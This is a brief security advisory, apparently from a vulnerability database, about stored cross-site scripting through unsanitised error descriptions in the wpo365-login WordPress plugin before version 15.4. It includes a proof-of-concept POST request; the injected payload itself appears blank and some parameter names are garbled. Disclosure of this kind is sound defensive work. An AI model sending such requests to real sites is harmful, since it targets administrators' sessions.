The plugin does not sanitise error descriptions before outputting them in the log notice, which could allow unauthenticated users to perform Cross-Site Scripting attacks against a logged in administrator
POST / HTTP/1.1 Content-Length: 242 Content-Type: application/x-www-form-urlencoded error=2&error;_description=&error;_uri=https%3A%2F%2Flogin.microsoftonline.com%2Ferror%3Fcode%3D700054&state;=https%3A%2F%2F192.168.88.176%2Fwp-login.php%3Flogin_errors%3DCHECK_LOG2
CPE | Name | Operator | Version |
---|---|---|---|
wpo365-login | lt | 15.4 |